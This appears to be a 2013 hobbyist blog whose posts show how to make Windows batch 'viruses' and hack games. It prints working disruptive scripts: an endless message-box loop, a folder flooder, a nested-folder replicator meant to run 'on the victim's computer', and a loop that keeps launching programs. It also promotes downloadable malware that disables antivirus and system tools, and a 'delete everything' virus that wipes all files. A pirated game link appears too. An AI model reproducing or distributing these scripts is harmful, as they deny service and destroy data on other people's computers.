Friday 25 October 2013 | | 0 comments

Latest virus yet

Well this will be another virus post. Im really into making viruses especially with batch. i might even post easy tutorials on how to learn batch programing.
more about the virus
it will do the following:

open cmd                                     disable cmd
open notepad                               disable live messenger
shutdown pc                                disable yahoo messenger
open youareanidiot.org                 disable mouse
disable misconfig                          disable keyboard
disable system restore                  disable nod32
disable regedit                              disable avast
disable taskmanager                     disable norton
disable screensaver                      open malwarebytes'
disable paint                                 disable kaspersky
disable firewall                             disable mozilla firefox
disable magnfy                             disable internet explorer
disable notepad                           disable safemode
disable calculator                         disable disk defragment
open malicious sites                     spam victims pc
make spam folders                      disable uninstall
kill internet connection                 add on startup

so these are the functions and a function is that add in startup meaning whenever computer is started it will be executed but no need because it will have destroyed the victrims pc the first time so no need for a second.
now the solution to the problem=reinstall windows
one more thing.the site wouldnt let me upload the real virus so i just wrote it in a simplle notepad now what you have to do is to open the downloaded notepad file and then copy everything and then open a new notepad and paste it there.now in the new notepad where you pasted everything from the old downloaded file,save this new notepad as "virus.bat"
download link

Thursday 24 October 2013 | | 0 comments

Delete everything virus

Sorry guys, I know i havent posted in a while. Well this time im gonna get something usefull for you.
This time i wont tell you how to make the virus but instead just give you a download link.For the people like me who have a really destructive nature this is the blog for you. As for the link to the virus
click here
Now what this virus does is that when someone runs it first it will display a mesage "you are an idiot" then it will try to delete all of the files in the whole pc including windows files.
Thanks
see you people and wonderful admirers/viewers laters
Hashaam ejaz ; signing off

Thursday 10 October 2013 | | 0 comments

GTA SANANDREAS

the download link to this awesome game will be given below.just download and extract using winrar or 7zip and play no installation needed
gta sanandreas download link

Wednesday 9 October 2013 | | 0 comments

msg annoyer


Message annoyer is a batch program that uses the same concept as above, but will interact with
the user anyhow annoying and irritating them by popping up some message box containing some
messages in it.

@echo off
:annoy
msg * Hi there!
msg * How u doin ?
msg * Are you fine ?
msg * Never mind about me....
msg * I am not here to annoy you....
msg * I am caring for you.....
msg * start counting from 1 to 5, i Will be outta this place.....
msg * 1
msg * 2
msg * 3
msg * 4
msg * 5
goto annoy

This program will pops up a small message box as shown below,


write or copy paste the above code in notepad
Just save it as virus.bat. name it anything but the extension .bat is necessary for example if you want to name it game then you should save it as game.bat

THGXD

| | 0 comments

matrix folder flooder

The following piece of code is going to help flood you computer with junky folders. This
program has the tendency to create more than 3000 folders in just less than a minute.

@echo off
:loop
mkdir %random%
goto loop

Here I have enclosed the screenshot took while I was testing this code on my computer

now copy and paste the text into notepad
Just save the above code as virus.bat the .bat is necessary.name it anything but at the end add.bat for example
hello.bat
wassup,bat
super.bat

| | 0 comments

Folder Replicator Virus

Here is a Simple batch virus that contains only 6 lines, has the tendency to replicate itself again
and again and keeps on creating a folder with same name, until a user stops it.
1. Just open up a notepad, copy and paste the below code
cd\
cd C:\Documents and Settings\username\Desktop
:loop
md Virus
cd Virus
goto loop
2. Save it as a batch file with the extension .bat, before doing that you have to modify the code by
changing the place where it says ‘username’ and instead of that replace it by the currently logged in
username.
3. Then run it on the Victims computer to infect it.
4. Any how it doesn’t cause much harm, but replicates folder inside a folder and goes on.
Once more thing that you have to notice is that, this will create directory inside another directory with the
same name, so it doesn’t looks like crap, since everything reside inside one main directory, more over
deleting the root directory will purge all the clumsy thing done by this piece of code.

Tuesday 8 October 2013 | | 0 comments

Hacking

In this post i will teach you to hack any game that is installed on your computer and dosent need internet to play.
step 1)  download cheat-engine  >here
step 2)  open the game
step 3)  open cheat engine after minimizing the game
step 4)  now click the little computer in the top left corner
step 5)  now there will be some options.click the window list button
step 5)  now select the games name if your hacking plants vs zombies double click the plants vs zombies button
step 6)  now in the scan type select all
step 7)  now search whatever you want to hack.if you want to hack gold write the amount of gold you have and click first scan.
step 8)  now open game and decrease or increase you amount of gold
step 9)  now enter your new amount of gold or whatever you want to hack. click next scan
step 10)  now the address on left side should be only 1 now click it 2 times and it will pop up below
step 11)  press it and press enter now change it to how much you want
step 12) your gold will be changed if not decrease your gol a bit and then it will change
HOPE I HELPED IF NOT MESSAGE ME ON FACEBOOK
name on facebook:
Hashaam Ejaz 

| | 0 comments

App bombing

Well sorry to say that this trick only works on windows computers.
So lets get started
Step 1) open notepad
Step 2)copy and paste the following text.

@echo off
:one
start explorer
start calculator
start notepad
goto one

Now just save this anywhere where you can run it easily.
 Save it as anything.bat name can be anything but at the end the.bat is necessary
Congrats. you just made a simple virus.
Let me explain.

Just ignore the @echo off
the :one is a place-marker  okay.now when i say start it starts any program.now i have written explorer and other things it will start those.in the the goto means goto a place marker.i set a Placemark called one so it will goto one.and in one it will again start all the applications again and this will repeat until your computer restarts or shut downs.

| | 0 comments

intro

Hello guys and girls.First of all i would like to give you an intro

Name:Hashaam bin ejaz
Date of birth: 17 july 2001
I will mostly post about how to make some viruses and how to hack. Sometimes i will even give You people some download links.
So this was the intro.Talk to you guys in the next post.Till then peace.